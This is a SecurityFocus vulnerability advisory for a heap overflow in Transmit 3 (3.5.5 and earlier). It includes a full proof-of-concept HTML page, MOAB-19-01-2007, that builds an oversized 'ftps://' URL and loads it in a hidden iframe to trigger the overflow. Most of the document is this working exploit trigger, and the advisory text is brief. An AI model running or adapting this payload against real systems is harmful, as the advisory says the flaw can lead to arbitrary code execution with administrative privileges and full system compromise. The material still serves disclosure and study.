source: https://www.securityfocus.com/bid/22145/info
Transmit 3 is prone to a heap-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer.
An attacker could leverage this issue to have arbitrary code execute with administrative privileges. A successful exploit could result in the complete compromise of the affected system.
Transmit 3 version 3.5.5 and prior are reported vulnerable.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>MOAB-19-01-2007</title>
<script>
function boom() {
var recipient = document.getElementById('testbox');
var str = '';
for (var i = 0; i < 408; i++) {
str = str + 'A'
}
str = str + 'ABCD';
alert('Payload size: ' + str.length);
str = "ftps://" + str;
ftarget = document.createElement('iframe');
ftarget.src = str;
ftarget.width = 1;
ftarget.height = 1;
recipient.appendChild(ftarget);
}
</script>
</head>
<body>
<div id="testbox" style="display: none;"></div>
<input type="button" onclick="boom();" value="Test MOAB-19-01-2007" />
</body>
</html>
